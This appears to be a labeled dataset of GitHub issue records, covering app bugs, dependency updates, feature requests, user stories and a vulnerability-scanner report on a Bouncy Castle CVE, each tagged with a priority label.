how do we send big mxf files to glacier the new a v workflows are going to ingest some extremely large mxf video files tens or hundreds of gigabytes each they also include videos which are much smaller and what we ll be serving most of the time we want to keep multiple copies of the files but we don t want to keep the warm replica as standard ia – that would be expensive and access to the mxf masters will be rare we d like to keep these objects in glacier instead is this an accurate summary of the problem
0
78,409
27,510,709,491
IssuesEvent
2023-03-06 08:35:35
vector-im/element-web
https://api.github.com/repos/vector-im/element-web
closed
"Error decrypting image" bubble should be styled
T-Defect S-Tolerable X-Needs-Design A-Error-Message A-Message-Bubbles O-Uncommon
### Steps to reproduce 1. Enable bubble layout 1. Send an image file to a room 2. Reload Element offline ### Outcome #### What did you expect? The error message should be styled properly. #### What happened instead? It is displayed as below. ![Untitled](https://user-images.githubusercontent.com/3362943/173580203-d04f80db-89a5-46f2-abe0-bf9ec47ff75e.png) ### Operating system Debian ### Browser information Firefox ESR 91 ### URL for webapp localhost ### Application version develop branch ### Homeserver _No response_ ### Will you send logs? No
1.0
"Error decrypting image" bubble should be styled - ### Steps to reproduce 1. Enable bubble layout 1. Send an image file to a room 2. Reload Element offline ### Outcome #### What did you expect? The error message should be styled properly. #### What happened instead? It is displayed as below. ![Untitled](https://user-images.githubusercontent.com/3362943/173580203-d04f80db-89a5-46f2-abe0-bf9ec47ff75e.png) ### Operating system Debian ### Browser information Firefox ESR 91 ### URL for webapp localhost ### Application version develop branch ### Homeserver _No response_ ### Will you send logs? No
non_priority
error decrypting image bubble should be styled steps to reproduce enable bubble layout send an image file to a room reload element offline outcome what did you expect the error message should be styled properly what happened instead it is displayed as below operating system debian browser information firefox esr url for webapp localhost application version develop branch homeserver no response will you send logs no
0
308,070
26,577,123,256
IssuesEvent
2023-01-22 00:11:13
opengapps/opengapps
https://api.github.com/repos/opengapps/opengapps
closed
Lineage 17.1 Open Gapps and Andoid Auto
bug needs testing
I instale the ( Lineage os 17.1.20200415 and Gapps) on my S8+ . All ok ,Thanks to the developer . The only problem is with Android Auto and the usb connection in Lineage software... maybe authorities usb choice is not to "file tranfer"... In S8+ with original samsung os "android 9" the application android auto with same version as above function very well. I think the problem is the way that lineage manage the usb connection with Android Auto!!! When Android Auto strat in the infotainment the phone usb force (goes) to "without file transfer" and the connection stops Any help ![20201204_080831](https://user-images.githubusercontent.com/75583308/101289466-54956180-3805-11eb-8f2c-ad269241ed6c.jpg)
1.0
Lineage 17.1 Open Gapps and Andoid Auto - I instale the ( Lineage os 17.1.20200415 and Gapps) on my S8+ . All ok ,Thanks to the developer . The only problem is with Android Auto and the usb connection in Lineage software... maybe authorities usb choice is not to "file tranfer"... In S8+ with original samsung os "android 9" the application android auto with same version as above function very well. I think the problem is the way that lineage manage the usb connection with Android Auto!!! When Android Auto strat in the infotainment the phone usb force (goes) to "without file transfer" and the connection stops Any help ![20201204_080831](https://user-images.githubusercontent.com/75583308/101289466-54956180-3805-11eb-8f2c-ad269241ed6c.jpg)
non_priority
lineage open gapps and andoid auto i instale the lineage os and gapps on my all ok thanks to the developer the only problem is with android auto and the usb connection in lineage software maybe authorities usb choice is not to file tranfer in with original samsung os android the application android auto with same version as above function very well i think the problem is the way that lineage manage the usb connection with android auto when android auto strat in the infotainment the phone usb force goes to without file transfer and the connection stops any help
0
116,201
9,828,847,765
IssuesEvent
2019-06-15 15:23:22
AlternateLife/Bugs
https://api.github.com/repos/AlternateLife/Bugs
opened
Auto ist startbar obwohl man in Handschellen ist
bug ingame stresstest
**Beschreibe den Fehler** Mann kann Fahrzeuge starten, wenn man in Handschellen liegt. **Reproduktion des Fehlers** Schritte, um den Fehler zu reproduzieren: 1. Spieler muss Schlüssel des Fahrzeugs besitzen 2. Spieler steigt in das Fahrzeug ein 3. Fahrzeug ist startbar (fahrbar nach vorne & hinten, nicht lenkbar) **Erwartetes Verhalten** Auto soll nicht startbar sein
1.0
Auto ist startbar obwohl man in Handschellen ist - **Beschreibe den Fehler** Mann kann Fahrzeuge starten, wenn man in Handschellen liegt. **Reproduktion des Fehlers** Schritte, um den Fehler zu reproduzieren: 1. Spieler muss Schlüssel des Fahrzeugs besitzen 2. Spieler steigt in das Fahrzeug ein 3. Fahrzeug ist startbar (fahrbar nach vorne & hinten, nicht lenkbar) **Erwartetes Verhalten** Auto soll nicht startbar sein
non_priority
auto ist startbar obwohl man in handschellen ist beschreibe den fehler mann kann fahrzeuge starten wenn man in handschellen liegt reproduktion des fehlers schritte um den fehler zu reproduzieren spieler muss schlüssel des fahrzeugs besitzen spieler steigt in das fahrzeug ein fahrzeug ist startbar fahrbar nach vorne hinten nicht lenkbar erwartetes verhalten auto soll nicht startbar sein
0
10,780
13,608,969,813
IssuesEvent
2020-09-23 03:53:43
GoogleCloudPlatform/python-docs-samples
https://api.github.com/repos/GoogleCloudPlatform/python-docs-samples
closed
Dependency Dashboard
type: process
This issue contains a list of Renovate updates and their statuses. ## Repository problems These problems occurred while renovating this repository. - WARN: Failed to read setup.py file ## Open These updates have all been created already. Click a checkbox below to force a retry/rebase of any. - [ ] <!-- rebase-branch=renovate/apache-airflow-1.x -->chore(deps): update dependency apache-airflow to v1.10.12 - [ ] <!-- rebase-branch=renovate/boto3-1.x -->chore(deps): update dependency boto3 to v1.15.2 - [ ] <!-- rebase-branch=renovate/cryptography-3.x -->chore(deps): update dependency cryptography to v3.1.1 - [ ] <!-- rebase-branch=renovate/flask-1.x -->chore(deps): update dependency flask to v1.1.2 (`Flask`, `flask`) - [ ] <!-- rebase-branch=renovate/google-api-python-client-1.x -->chore(deps): update dependency google-api-python-client to v1.12.1 - [ ] <!-- rebase-branch=renovate/google-cloud-storage-1.x -->chore(deps): update dependency google-cloud-storage to v1.31.1 - [ ] <!-- rebase-branch=renovate/pytest-6.x -->chore(deps): update dependency pytest to v6.0.2 - [ ] <!-- rebase-branch=renovate/twilio-6.x -->chore(deps): update dependency twilio to v6.45.3 - [ ] <!-- rebase-branch=renovate/docker-ubuntu-18.x -->chore(deps): update ubuntu docker tag to v18.10 - [ ] <!-- rebase-branch=renovate/google-cloud-automl-2.x -->chore(deps): update dependency google-cloud-automl to v2 - [ ] <!-- rebase-branch=renovate/google-cloud-iot-2.x -->chore(deps): update dependency google-cloud-iot to v2 - [ ] <!-- rebase-branch=renovate/google-cloud-pubsub-2.x -->chore(deps): update dependency google-cloud-pubsub to v2 - [ ] <!-- rebase-branch=renovate/google-cloud-trace-1.x -->chore(deps): update dependency google-cloud-trace to v1 - [ ] <!-- rebase-branch=renovate/google-cloud-translate-3.x -->chore(deps): update dependency google-cloud-translate to v3 - [ ] <!-- rebase-branch=renovate/mock-4.x -->chore(deps): update dependency mock to v4 - [ ] <!-- rebase-all-open-prs -->**Check this option to rebase all the above open PRs at once** --- - [ ] <!-- manual job -->Check this box to trigger a request for Renovate to run again on this repository
1.0
Dependency Dashboard - This issue contains a list of Renovate updates and their statuses. ## Repository problems These problems occurred while renovating this repository. - WARN: Failed to read setup.py file ## Open These updates have all been created already. Click a checkbox below to force a retry/rebase of any. - [ ] <!-- rebase-branch=renovate/apache-airflow-1.x -->chore(deps): update dependency apache-airflow to v1.10.12 - [ ] <!-- rebase-branch=renovate/boto3-1.x -->chore(deps): update dependency boto3 to v1.15.2 - [ ] <!-- rebase-branch=renovate/cryptography-3.x -->chore(deps): update dependency cryptography to v3.1.1 - [ ] <!-- rebase-branch=renovate/flask-1.x -->chore(deps): update dependency flask to v1.1.2 (`Flask`, `flask`) - [ ] <!-- rebase-branch=renovate/google-api-python-client-1.x -->chore(deps): update dependency google-api-python-client to v1.12.1 - [ ] <!-- rebase-branch=renovate/google-cloud-storage-1.x -->chore(deps): update dependency google-cloud-storage to v1.31.1 - [ ] <!-- rebase-branch=renovate/pytest-6.x -->chore(deps): update dependency pytest to v6.0.2 - [ ] <!-- rebase-branch=renovate/twilio-6.x -->chore(deps): update dependency twilio to v6.45.3 - [ ] <!-- rebase-branch=renovate/docker-ubuntu-18.x -->chore(deps): update ubuntu docker tag to v18.10 - [ ] <!-- rebase-branch=renovate/google-cloud-automl-2.x -->chore(deps): update dependency google-cloud-automl to v2 - [ ] <!-- rebase-branch=renovate/google-cloud-iot-2.x -->chore(deps): update dependency google-cloud-iot to v2 - [ ] <!-- rebase-branch=renovate/google-cloud-pubsub-2.x -->chore(deps): update dependency google-cloud-pubsub to v2 - [ ] <!-- rebase-branch=renovate/google-cloud-trace-1.x -->chore(deps): update dependency google-cloud-trace to v1 - [ ] <!-- rebase-branch=renovate/google-cloud-translate-3.x -->chore(deps): update dependency google-cloud-translate to v3 - [ ] <!-- rebase-branch=renovate/mock-4.x -->chore(deps): update dependency mock to v4 - [ ] <!-- rebase-all-open-prs -->**Check this option to rebase all the above open PRs at once** --- - [ ] <!-- manual job -->Check this box to trigger a request for Renovate to run again on this repository
non_priority
dependency dashboard this issue contains a list of renovate updates and their statuses repository problems these problems occurred while renovating this repository warn failed to read setup py file open these updates have all been created already click a checkbox below to force a retry rebase of any chore deps update dependency apache airflow to chore deps update dependency to chore deps update dependency cryptography to chore deps update dependency flask to flask flask chore deps update dependency google api python client to chore deps update dependency google cloud storage to chore deps update dependency pytest to chore deps update dependency twilio to chore deps update ubuntu docker tag to chore deps update dependency google cloud automl to chore deps update dependency google cloud iot to chore deps update dependency google cloud pubsub to chore deps update dependency google cloud trace to chore deps update dependency google cloud translate to chore deps update dependency mock to check this option to rebase all the above open prs at once check this box to trigger a request for renovate to run again on this repository
0
24,783
4,108,851,384
IssuesEvent
2016-06-06 17:29:59
Microsoft/vscode
https://api.github.com/repos/Microsoft/vscode
closed
Show tooltips for labels that get truncated
feature-request v-test workbench
- VSCode Version:0.10.12-alpha - OS Version: WIndows10 Steps to Reproduce: 1. Launch app and open any folder which has long name. 2. Adjust editor view area so that text under explorer should be truncated with ... 3. Mouse hove on folder name in explorer window, Actual: No tooltip is displaying. ![image](https://cloud.githubusercontent.com/assets/17735796/14091461/48336124-f4f5-11e5-8d9c-1ef9284a6612.png) Expected: User should be able to see full name when hover over on folder or file truncated with ellipsis. Similar to visual studio. ![image](https://cloud.githubusercontent.com/assets/17735796/14091310/607c189e-f4f4-11e5-9562-2c8a07b87edf.png)
1.0
Show tooltips for labels that get truncated - - VSCode Version:0.10.12-alpha - OS Version: WIndows10 Steps to Reproduce: 1. Launch app and open any folder which has long name. 2. Adjust editor view area so that text under explorer should be truncated with ... 3. Mouse hove on folder name in explorer window, Actual: No tooltip is displaying. ![image](https://cloud.githubusercontent.com/assets/17735796/14091461/48336124-f4f5-11e5-8d9c-1ef9284a6612.png) Expected: User should be able to see full name when hover over on folder or file truncated with ellipsis. Similar to visual studio. ![image](https://cloud.githubusercontent.com/assets/17735796/14091310/607c189e-f4f4-11e5-9562-2c8a07b87edf.png)
non_priority
show tooltips for labels that get truncated vscode version alpha os version steps to reproduce launch app and open any folder which has long name adjust editor view area so that text under explorer should be truncated with mouse hove on folder name in explorer window actual no tooltip is displaying expected user should be able to see full name when hover over on folder or file truncated with ellipsis similar to visual studio
0
578
10,253,321,104
IssuesEvent
2019-08-21 11:00:12
ushahidi/tenfour
https://api.github.com/repos/ushahidi/tenfour
opened
Add person during Check-in creation #704
Feature: Check-In Feature: People P1 - Immediate enhancement
When composing a Checkin, a user should be able to add users AND create new users who are not yet in "People" in order to save state on their message while including new members of their team
1.0
Add person during Check-in creation #704 - When composing a Checkin, a user should be able to add users AND create new users who are not yet in "People" in order to save state on their message while including new members of their team
non_priority
add person during check in creation when composing a checkin a user should be able to add users and create new users who are not yet in people in order to save state on their message while including new members of their team
0
191,999
14,598,249,911
IssuesEvent
2020-12-21 00:00:10
github-vet/rangeloop-pointer-findings
https://api.github.com/repos/github-vet/rangeloop-pointer-findings
closed
rowland/fbx: columns_test.go; 5 LoC
fresh test tiny
Found a possible issue in [rowland/fbx](https://www.github.com/rowland/fbx) at [columns_test.go](https://github.com/rowland/fbx/blob/a1819ef0d584d0ee36eae5115f31560e1e9efde0/columns_test.go#L80-L84) Below is the message reported by the analyzer for this snippet of code. Beware that the analyzer only reports the first issue it finds, so please do not limit your consideration to the contents of the below message. > function call which takes a reference to exp at line 81 may start a goroutine [Click here to see the code in its original context.](https://github.com/rowland/fbx/blob/a1819ef0d584d0ee36eae5115f31560e1e9efde0/columns_test.go#L80-L84) <details> <summary>Click here to show the 5 line(s) of Go which triggered the analyzer.</summary> ```go for i, exp := range expectedColumns { if !reflect.DeepEqual(&exp, cols[i]) { t.Errorf("Expected %#v,\n got %#v", &exp, cols[i]) } } ``` </details> Leave a reaction on this issue to contribute to the project by classifying this instance as a **Bug** :-1:, **Mitigated** :+1:, or **Desirable Behavior** :rocket: See the descriptions of the classifications [here](https://github.com/github-vet/rangeclosure-findings#how-can-i-help) for more information. commit ID: a1819ef0d584d0ee36eae5115f31560e1e9efde0
1.0
rowland/fbx: columns_test.go; 5 LoC - Found a possible issue in [rowland/fbx](https://www.github.com/rowland/fbx) at [columns_test.go](https://github.com/rowland/fbx/blob/a1819ef0d584d0ee36eae5115f31560e1e9efde0/columns_test.go#L80-L84) Below is the message reported by the analyzer for this snippet of code. Beware that the analyzer only reports the first issue it finds, so please do not limit your consideration to the contents of the below message. > function call which takes a reference to exp at line 81 may start a goroutine [Click here to see the code in its original context.](https://github.com/rowland/fbx/blob/a1819ef0d584d0ee36eae5115f31560e1e9efde0/columns_test.go#L80-L84) <details> <summary>Click here to show the 5 line(s) of Go which triggered the analyzer.</summary> ```go for i, exp := range expectedColumns { if !reflect.DeepEqual(&exp, cols[i]) { t.Errorf("Expected %#v,\n got %#v", &exp, cols[i]) } } ``` </details> Leave a reaction on this issue to contribute to the project by classifying this instance as a **Bug** :-1:, **Mitigated** :+1:, or **Desirable Behavior** :rocket: See the descriptions of the classifications [here](https://github.com/github-vet/rangeclosure-findings#how-can-i-help) for more information. commit ID: a1819ef0d584d0ee36eae5115f31560e1e9efde0
non_priority
rowland fbx columns test go loc found a possible issue in at below is the message reported by the analyzer for this snippet of code beware that the analyzer only reports the first issue it finds so please do not limit your consideration to the contents of the below message function call which takes a reference to exp at line may start a goroutine click here to show the line s of go which triggered the analyzer go for i exp range expectedcolumns if reflect deepequal exp cols t errorf expected v n got v exp cols leave a reaction on this issue to contribute to the project by classifying this instance as a bug mitigated or desirable behavior rocket see the descriptions of the classifications for more information commit id
0
35,506
6,476,001,280
IssuesEvent
2017-08-17 21:42:20
evhub/coconut
https://api.github.com/repos/evhub/coconut
opened
Write a more beginner-focused tutorial for Coconut
contributor friendly documentation
Should create an alternate tutorial that assumes no prior knowledge of Python that at some point directs people into the main tutorial.
1.0
Write a more beginner-focused tutorial for Coconut - Should create an alternate tutorial that assumes no prior knowledge of Python that at some point directs people into the main tutorial.
non_priority
write a more beginner focused tutorial for coconut should create an alternate tutorial that assumes no prior knowledge of python that at some point directs people into the main tutorial
0
217,313
24,326,000,834
IssuesEvent
2022-09-30 14:49:46
Sharecare/capacitor-plugin-aep-analytics
https://api.github.com/repos/Sharecare/capacitor-plugin-aep-analytics
opened
CVE-2020-26939 (Medium) detected in bcprov-jdk15on-1.56.jar
security vulnerability
## CVE-2020-26939 - Medium Severity Vulnerability <details><summary><img src='https://whitesource-resources.whitesourcesoftware.com/vulnerability_details.png' width=19 height=20> Vulnerable Library - <b>bcprov-jdk15on-1.56.jar</b></p></summary> <p>The Bouncy Castle Crypto package is a Java implementation of cryptographic algorithms. This jar contains JCE provider and lightweight API for the Bouncy Castle Cryptography APIs for JDK 1.5 to JDK 1.8.</p> <p>Library home page: <a href="http://www.bouncycastle.org/java.html">http://www.bouncycastle.org/java.html</a></p> <p>Path to dependency file: /android/build.gradle</p> <p>Path to vulnerable library: /home/wss-scanner/.gradle/caches/modules-2/files-2.1/org.bouncycastle/bcprov-jdk15on/1.56/a153c6f9744a3e9dd6feab5e210e1c9861362ec7/bcprov-jdk15on-1.56.jar</p> <p> Dependency Hierarchy: - lint-gradle-27.2.1.jar (Root Library) - sdk-common-27.2.1.jar - :x: **bcprov-jdk15on-1.56.jar** (Vulnerable Library) <p>Found in HEAD commit: <a href="https://github.com/Sharecare/capacitor-plugin-aep-analytics/commit/359199a86cd4095312b4582afe7ad22e605dca6f">359199a86cd4095312b4582afe7ad22e605dca6f</a></p> <p>Found in base branch: <b>main</b></p> </p> </details> <p></p> <details><summary><img src='https://whitesource-resources.whitesourcesoftware.com/medium_vul.png' width=19 height=20> Vulnerability Details</summary> <p> In Legion of the Bouncy Castle BC before 1.61 and BC-FJA before 1.0.1.2, attackers can obtain sensitive information about a private exponent because of Observable Differences in Behavior to Error Inputs. This occurs in org.bouncycastle.crypto.encodings.OAEPEncoding. Sending invalid ciphertext that decrypts to a short payload in the OAEP Decoder could result in the throwing of an early exception, potentially leaking some information about the private exponent of the RSA private key performing the encryption. <p>Publish Date: 2020-11-02 <p>URL: <a href=https://vuln.whitesourcesoftware.com/vulnerability/CVE-2020-26939>CVE-2020-26939</a></p> </p> </details> <p></p> <details><summary><img src='https://whitesource-resources.whitesourcesoftware.com/cvss3.png' width=19 height=20> CVSS 3 Score Details (<b>5.3</b>)</summary> <p> Base Score Metrics: - Exploitability Metrics: - Attack Vector: Network - Attack Complexity: Low - Privileges Required: None - User Interaction: None - Scope: Unchanged - Impact Metrics: - Confidentiality Impact: Low - Integrity Impact: None - Availability Impact: None </p> For more information on CVSS3 Scores, click <a href="https://www.first.org/cvss/calculator/3.0">here</a>. </p> </details> <p></p> <details><summary><img src='https://whitesource-resources.whitesourcesoftware.com/suggested_fix.png' width=19 height=20> Suggested Fix</summary> <p> <p>Type: Upgrade version</p> <p>Release Date: 2020-11-02</p> <p>Fix Resolution: org.bouncycastle:bcprov-jdk14:1.61,org.bouncycastle:bcprov-ext-debug-jdk15on:1.61,org.bouncycastle:bcprov-debug-jdk15on:1.61,org.bouncycastle:bcprov-ext-jdk15on:1.61,org.bouncycastle:bcprov-jdk15on:1.61</p> </p> </details> <p></p>
True
CVE-2020-26939 (Medium) detected in bcprov-jdk15on-1.56.jar - ## CVE-2020-26939 - Medium Severity Vulnerability <details><summary><img src='https://whitesource-resources.whitesourcesoftware.com/vulnerability_details.png' width=19 height=20> Vulnerable Library - <b>bcprov-jdk15on-1.56.jar</b></p></summary> <p>The Bouncy Castle Crypto package is a Java implementation of cryptographic algorithms. This jar contains JCE provider and lightweight API for the Bouncy Castle Cryptography APIs for JDK 1.5 to JDK 1.8.</p> <p>Library home page: <a href="http://www.bouncycastle.org/java.html">http://www.bouncycastle.org/java.html</a></p> <p>Path to dependency file: /android/build.gradle</p> <p>Path to vulnerable library: /home/wss-scanner/.gradle/caches/modules-2/files-2.1/org.bouncycastle/bcprov-jdk15on/1.56/a153c6f9744a3e9dd6feab5e210e1c9861362ec7/bcprov-jdk15on-1.56.jar</p> <p> Dependency Hierarchy: - lint-gradle-27.2.1.jar (Root Library) - sdk-common-27.2.1.jar - :x: **bcprov-jdk15on-1.56.jar** (Vulnerable Library) <p>Found in HEAD commit: <a href="https://github.com/Sharecare/capacitor-plugin-aep-analytics/commit/359199a86cd4095312b4582afe7ad22e605dca6f">359199a86cd4095312b4582afe7ad22e605dca6f</a></p> <p>Found in base branch: <b>main</b></p> </p> </details> <p></p> <details><summary><img src='https://whitesource-resources.whitesourcesoftware.com/medium_vul.png' width=19 height=20> Vulnerability Details</summary> <p> In Legion of the Bouncy Castle BC before 1.61 and BC-FJA before 1.0.1.2, attackers can obtain sensitive information about a private exponent because of Observable Differences in Behavior to Error Inputs. This occurs in org.bouncycastle.crypto.encodings.OAEPEncoding. Sending invalid ciphertext that decrypts to a short payload in the OAEP Decoder could result in the throwing of an early exception, potentially leaking some information about the private exponent of the RSA private key performing the encryption. <p>Publish Date: 2020-11-02 <p>URL: <a href=https://vuln.whitesourcesoftware.com/vulnerability/CVE-2020-26939>CVE-2020-26939</a></p> </p> </details> <p></p> <details><summary><img src='https://whitesource-resources.whitesourcesoftware.com/cvss3.png' width=19 height=20> CVSS 3 Score Details (<b>5.3</b>)</summary> <p> Base Score Metrics: - Exploitability Metrics: - Attack Vector: Network - Attack Complexity: Low - Privileges Required: None - User Interaction: None - Scope: Unchanged - Impact Metrics: - Confidentiality Impact: Low - Integrity Impact: None - Availability Impact: None </p> For more information on CVSS3 Scores, click <a href="https://www.first.org/cvss/calculator/3.0">here</a>. </p> </details> <p></p> <details><summary><img src='https://whitesource-resources.whitesourcesoftware.com/suggested_fix.png' width=19 height=20> Suggested Fix</summary> <p> <p>Type: Upgrade version</p> <p>Release Date: 2020-11-02</p> <p>Fix Resolution: org.bouncycastle:bcprov-jdk14:1.61,org.bouncycastle:bcprov-ext-debug-jdk15on:1.61,org.bouncycastle:bcprov-debug-jdk15on:1.61,org.bouncycastle:bcprov-ext-jdk15on:1.61,org.bouncycastle:bcprov-jdk15on:1.61</p> </p> </details> <p></p>
non_priority
cve medium detected in bcprov jar cve medium severity vulnerability vulnerable library bcprov jar the bouncy castle crypto package is a java implementation of cryptographic algorithms this jar contains jce provider and lightweight api for the bouncy castle cryptography apis for jdk to jdk library home page a href path to dependency file android build gradle path to vulnerable library home wss scanner gradle caches modules files org bouncycastle bcprov bcprov jar dependency hierarchy lint gradle jar root library sdk common jar x bcprov jar vulnerable library found in head commit a href found in base branch main vulnerability details in legion of the bouncy castle bc before and bc fja before attackers can obtain sensitive information about a private exponent because of observable differences in behavior to error inputs this occurs in org bouncycastle crypto encodings oaepencoding sending invalid ciphertext that decrypts to a short payload in the oaep decoder could result in the throwing of an early exception potentially leaking some information about the private exponent of the rsa private key performing the encryption publish date url a href cvss score details base score metrics exploitability metrics attack vector network attack complexity low privileges required none user interaction none scope unchanged impact metrics confidentiality impact low integrity impact none availability impact none for more information on scores click a href suggested fix type upgrade version release date fix resolution org bouncycastle bcprov org bouncycastle bcprov ext debug org bouncycastle bcprov debug org bouncycastle bcprov ext org bouncycastle bcprov
0
338,643
24,593,507,075
IssuesEvent
2022-10-14 06:01:16
oleksandrblazhko/nai205-guda
https://api.github.com/repos/oleksandrblazhko/nai205-guda
closed
CW1
documentation
Завдання 1 1. Як потребу обираю спілкування на тему масової культури 2. Для споживачки складно знайти співбесідників для спілкування на теми масової культури, тому доступність визначається як "недоступно". Завдання 2 1. Мета: Надати пояснення як підтримувати свій психологічно-емоціональний стан під час співу та спілкування на теми масової культури, включаючи освітлення навколишнього середовища. 2. Feature: Перегляд можливих варіантів освітлення As a клієнтка цього інтернет-магазину I want to мати можливість швидко знаходити потрібний товар . In order to була можливість детальніше дізнатися інформацію про певний товар Scenario 1: при додаванні товарів в кошик мені пропонуються товари зі схожими характеристиками Given клієнт робить замовлення And обирає товари певної категорії. When товари вже додані до кошика Then клієнт має змогу бачити товари з схожими характеристиками. Scenario 2: товари можна обрати за певними категоріями Given клієнт обирає певний товар And хоче швидко обрати потрібний товар When коли тільки зайшли на сайт Then він має змогу сортувати товар за будь-якою характеристикою Feature: Пошук людей на Online-платформах As a користувачка цієї Online-платформи I want to мати можливість знаходити інших користувачів цієї платформи In order to була можливість спілкуватися на потрібні мені теми Scenario 1: при авторизації на платформі є можливість вказати тематику спілкування Given користувач авторизується на платформі And вказує свої хобі та інтереси при авторизації When всі дані вказано Then користувач має змогу побачити підбірку акаунтів зі схожими інтересами Scenario 2: можна змінити тематику спілкування в будь-який момент Given користувач уже зареєстрований на платформі And хоче змінити тематику спілкування, свої інтереси та хобі When коли користувач перебуває на сайті та в нього з'являться бажання змінити тематику спілкування Then він має можливість в налаштуваннях свого акаунту змінити цю інформацію Feature: використання додатку для співу As a користувачка цього додатку I want to мати можливість швидко знаходити певну категорію пісні In order to була можливість підтримувати психологічно-емоціональний стан за допомогою цього додатку Scenario 1: в додатку є можливість вибору заздалегідь заготовлених категорій пісень на головній сторінці додатку Given користувачка відкриває додаток And хоче обрати категорію пісні. When використовує цей додаток і має потребу підтримати свій психологічно-емоціональний стан Then користувачка має змогу серед категорій тематики пісень швидко обрати потрібну Scenario 2: можна власноруч ввести в пошуковій строкі потрібну тематику пісні Given користувачка використовує додаток And хоче швидко знайти потрібну тематику пісні When коли перебуває на будь-якій сторінці додатку Then має можливість в пошуковій строкі власноруч ввести потрібну тематику пісні
1.0
CW1 - Завдання 1 1. Як потребу обираю спілкування на тему масової культури 2. Для споживачки складно знайти співбесідників для спілкування на теми масової культури, тому доступність визначається як "недоступно". Завдання 2 1. Мета: Надати пояснення як підтримувати свій психологічно-емоціональний стан під час співу та спілкування на теми масової культури, включаючи освітлення навколишнього середовища. 2. Feature: Перегляд можливих варіантів освітлення As a клієнтка цього інтернет-магазину I want to мати можливість швидко знаходити потрібний товар . In order to була можливість детальніше дізнатися інформацію про певний товар Scenario 1: при додаванні товарів в кошик мені пропонуються товари зі схожими характеристиками Given клієнт робить замовлення And обирає товари певної категорії. When товари вже додані до кошика Then клієнт має змогу бачити товари з схожими характеристиками. Scenario 2: товари можна обрати за певними категоріями Given клієнт обирає певний товар And хоче швидко обрати потрібний товар When коли тільки зайшли на сайт Then він має змогу сортувати товар за будь-якою характеристикою Feature: Пошук людей на Online-платформах As a користувачка цієї Online-платформи I want to мати можливість знаходити інших користувачів цієї платформи In order to була можливість спілкуватися на потрібні мені теми Scenario 1: при авторизації на платформі є можливість вказати тематику спілкування Given користувач авторизується на платформі And вказує свої хобі та інтереси при авторизації When всі дані вказано Then користувач має змогу побачити підбірку акаунтів зі схожими інтересами Scenario 2: можна змінити тематику спілкування в будь-який момент Given користувач уже зареєстрований на платформі And хоче змінити тематику спілкування, свої інтереси та хобі When коли користувач перебуває на сайті та в нього з'являться бажання змінити тематику спілкування Then він має можливість в налаштуваннях свого акаунту змінити цю інформацію Feature: використання додатку для співу As a користувачка цього додатку I want to мати можливість швидко знаходити певну категорію пісні In order to була можливість підтримувати психологічно-емоціональний стан за допомогою цього додатку Scenario 1: в додатку є можливість вибору заздалегідь заготовлених категорій пісень на головній сторінці додатку Given користувачка відкриває додаток And хоче обрати категорію пісні. When використовує цей додаток і має потребу підтримати свій психологічно-емоціональний стан Then користувачка має змогу серед категорій тематики пісень швидко обрати потрібну Scenario 2: можна власноруч ввести в пошуковій строкі потрібну тематику пісні Given користувачка використовує додаток And хоче швидко знайти потрібну тематику пісні When коли перебуває на будь-якій сторінці додатку Then має можливість в пошуковій строкі власноруч ввести потрібну тематику пісні
non_priority
завдання як потребу обираю спілкування на тему масової культури для споживачки складно знайти співбесідників для спілкування на теми масової культури тому доступність визначається як недоступно завдання мета надати пояснення як підтримувати свій психологічно емоціональний стан під час співу та спілкування на теми масової культури включаючи освітлення навколишнього середовища feature перегляд можливих варіантів освітлення as a клієнтка цього інтернет магазину i want to мати можливість швидко знаходити потрібний товар in order to була можливість детальніше дізнатися інформацію про певний товар scenario при додаванні товарів в кошик мені пропонуються товари зі схожими характеристиками given клієнт робить замовлення and обирає товари певної категорії when товари вже додані до кошика then клієнт має змогу бачити товари з схожими характеристиками scenario товари можна обрати за певними категоріями given клієнт обирає певний товар and хоче швидко обрати потрібний товар when коли тільки зайшли на сайт then він має змогу сортувати товар за будь якою характеристикою feature пошук людей на online платформах as a користувачка цієї online платформи i want to мати можливість знаходити інших користувачів цієї платформи in order to була можливість спілкуватися на потрібні мені теми scenario при авторизації на платформі є можливість вказати тематику спілкування given користувач авторизується на платформі and вказує свої хобі та інтереси при авторизації when всі дані вказано then користувач має змогу побачити підбірку акаунтів зі схожими інтересами scenario можна змінити тематику спілкування в будь який момент given користувач уже зареєстрований на платформі and хоче змінити тематику спілкування свої інтереси та хобі when коли користувач перебуває на сайті та в нього з являться бажання змінити тематику спілкування then він має можливість в налаштуваннях свого акаунту змінити цю інформацію feature використання додатку для співу as a користувачка цього додатку i want to мати можливість швидко знаходити певну категорію пісні in order to була можливість підтримувати психологічно емоціональний стан за допомогою цього додатку scenario в додатку є можливість вибору заздалегідь заготовлених категорій пісень на головній сторінці додатку given користувачка відкриває додаток and хоче обрати категорію пісні when використовує цей додаток і має потребу підтримати свій психологічно емоціональний стан then користувачка має змогу серед категорій тематики пісень швидко обрати потрібну scenario можна власноруч ввести в пошуковій строкі потрібну тематику пісні given користувачка використовує додаток and хоче швидко знайти потрібну тематику пісні when коли перебуває на будь якій сторінці додатку then має можливість в пошуковій строкі власноруч ввести потрібну тематику пісні
0
243,530
18,716,536,153
IssuesEvent
2021-11-03 06:05:53
ZeeHatcher/lighting-project
https://api.github.com/repos/ZeeHatcher/lighting-project
closed
Documentation for the system
documentation
Documentation for how the system works such as process flow, cloud architecture, code explanations, etc.
1.0
Documentation for the system - Documentation for how the system works such as process flow, cloud architecture, code explanations, etc.
non_priority
documentation for the system documentation for how the system works such as process flow cloud architecture code explanations etc
0
236,632
26,033,691,232
IssuesEvent
2022-12-22 01:07:37
panasalap/frameworks_av_Before
https://api.github.com/repos/panasalap/frameworks_av_Before
closed
CVE-2020-0245 (High) detected in avandroid-10.0.0_r34 - autoclosed
security vulnerability
